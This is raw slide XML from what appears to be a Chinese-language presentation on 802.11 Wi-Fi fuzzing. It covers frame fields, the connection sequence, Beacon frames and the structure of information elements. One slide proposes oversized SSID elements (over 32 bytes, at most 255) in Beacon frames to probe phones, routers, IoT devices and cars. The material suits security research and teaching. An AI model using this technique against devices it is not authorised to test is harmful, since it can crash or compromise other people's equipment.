                </a:rPr>
                <a:t>2.</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="+mn-lt"/>
                </a:rPr>
                <a:t>无线攻防的进阶</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15" descr="微信图片_201806281745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930" y="-113030"/>
            <a:ext cx="2033905" cy="20339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0">
        <p15:prstTrans prst="fallOver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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="微信截图_2018081218322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7825" y="1766570"/>
            <a:ext cx="8211820" cy="411543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8589645" y="2085975"/>
            <a:ext cx="3378835" cy="36925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控制字段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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*Protocol version：表明版本类型，现在所有帧里面这个字段都是0x00。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 *Type：指明数据帧类型，是管理帧，数据帧还是控制帧。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*Subtype：指明数据帧的子类型，因为就算是控制帧，控制帧还分RTS帧，CTS帧，ACK    帧等等，通过这个域判断出该数据帧的具体类型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>........</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.......................</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1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82295" y="1690370"/>
            <a:ext cx="8823325" cy="81241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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WIFI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>连接过程：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client   ←   SCAN   →   AP              </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            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 ←   AUTH    →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  AP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>             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←   ASSOC   →  AP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>             ←  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连接成功 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→  AP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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848225" y="2009775"/>
            <a:ext cx="6149340" cy="31381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针对客户端的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Beacon </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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路由器通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Beaco</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>携带</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>进行对客户端声明。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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客户端接收到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Beacon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2" descr="微信截图_2018081218593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9075" y="1740535"/>
            <a:ext cx="6077585" cy="90487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19075" y="2848610"/>
            <a:ext cx="620712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管理帧格式规定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>信息元素在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0-32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>个字节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适用于规范的设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:PHONE.PAD....Router....smart IOT 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19075" y="3708400"/>
            <a:ext cx="5579745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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>思路</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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构造长度</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;32 &amp;&amp; ≤255</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>byte SSID IE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>对象：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移动设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>....pad...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>汽车</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>....</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5" descr="PPT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9995" y="3603625"/>
            <a:ext cx="6792595" cy="315722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1922780" y="453390"/>
            <a:ext cx="48514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000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>802.11-Fuzzing</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4000" b="1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81965" y="1710055"/>
            <a:ext cx="7896225" cy="2584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关于information elements</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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信息元素是management frames.中的必要字段，信息元素是由类型、长度和值组成的。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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信息元素由一个8位的类型字段，一个8位的长度字段，和多达255个字节的数据。 这种类型的结构是非常类似于在许多不同的协议中使用的普通类型-长度-值（TLV）形式。 例如：信标和探测响应分组必须包含一个SSID 信息元素，对于大多数无线客户端处理数据包。一个支持信息元素值和信道信息元素。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="表格 4"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1137285" y="4295140"/>
          <a:ext cx="4443095" cy="113093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14095"/>
                <a:gridCol w="750570"/>
                <a:gridCol w="375920"/>
                <a:gridCol w="337820"/>
                <a:gridCol w="1964690"/>
              </a:tblGrid>
              <a:tr h="22796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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Field</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Size</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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9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endParaRPr lang="en-US" altLang="en-US" sz="9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0" vert="horz" anchor="b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9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endParaRPr lang="en-US" altLang="en-US" sz="9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0" vert="horz" anchor="b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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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3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endParaRPr lang="en-US" altLang="en-US" sz="3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0" vert="horz" anchor="b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12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314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3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endParaRPr lang="en-US" altLang="en-US" sz="3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0" vert="horz" anchor="b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12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314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3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endParaRPr lang="en-US" altLang="en-US" sz="3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0" vert="horz" anchor="b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12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314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3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endParaRPr lang="en-US" altLang="en-US" sz="3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0" vert="horz" anchor="b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12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314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3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endParaRPr lang="en-US" altLang="en-US" sz="3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0" vert="horz" anchor="b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12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314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7368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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Type</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314"/>
                      </a:solidFill>
                      <a:prstDash val="solid"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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>1 byte</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314"/>
                      </a:solidFill>
                      <a:prstDash val="solid"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1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endParaRPr lang="en-US" altLang="en-US" sz="11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0" vert="horz" anchor="b">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314"/>
                      </a:solidFill>
                      <a:prstDash val="solid"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1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endParaRPr lang="en-US" altLang="en-US" sz="11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0" vert="horz" anchor="b">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314"/>
                      </a:solidFill>
                      <a:prstDash val="solid"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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Information element type (ID)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR cap="flat">
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="141314"/>
                      </a:solidFill>
                      <a:prstDash val="solid"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7305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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Length</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>1 byte</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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1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endParaRPr lang="en-US" altLang="en-US" sz="11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0" vert="horz" anchor="b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1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endParaRPr lang="en-US" altLang="en-US" sz="11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0" vert="horz" anchor="b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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Information element length</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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7368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800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="800" b="0">
                          <a:solidFill>
                            <a:srgbClr val="141314"/>
                          </a:solidFill>
                          <a:latin typeface="Times" charset="0"/>
                          <a:cs typeface="Times" charset="0"/>
                        </a:rPr>
                        <a:t>Length byte(s)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="800" b="0">
                        <a:solidFill>
                          <a:srgbClr val="141314"/>
                        </a:solidFill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0" marR="0" marT="0" marB="0" vert="horz" anchor="b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cPr>
                    <a:lnT cap="flat">
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB cap="flat">
                      <a:noFill/>
